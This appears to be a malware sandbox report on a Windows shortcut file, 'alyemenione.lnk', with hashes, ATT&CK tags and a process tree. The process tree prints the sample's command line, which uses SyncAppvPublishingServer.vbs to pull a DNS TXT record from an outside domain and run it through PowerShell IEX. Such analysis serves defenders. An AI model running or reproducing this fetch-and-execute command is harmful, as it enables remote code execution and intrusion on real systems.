9dd34887a7aa11ba28a8e63d484274110ab40a6ad7035f8ff93c19c12ec66542

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
18-12-2024 22:05

Target

alyemenione.lnk
Size

2KB
MD5

12ca834e507ca967d01911cec7454312
SHA1

2d43271a7ec861f87da9bdeced53bd9bb20986ff
SHA256

9dd34887a7aa11ba28a8e63d484274110ab40a6ad7035f8ff93c19c12ec66542
SHA512

b3033aab1d18a50957e698bf0dbdaa3e8245f1a74bc7129b486d1ee2f0c5164998603616b48cc67fd4e8cca7bcc40c36ca51e7a5ccf6c54fe02277615c9de4fa

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2252 wrote to memory of 2768	2252	cmd.exe	32
PID 2252 wrote to memory of 2768	2252	cmd.exe	32
PID 2252 wrote to memory of 2768	2252	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\alyemenione.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX"
  2⤵
  PID:2768

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact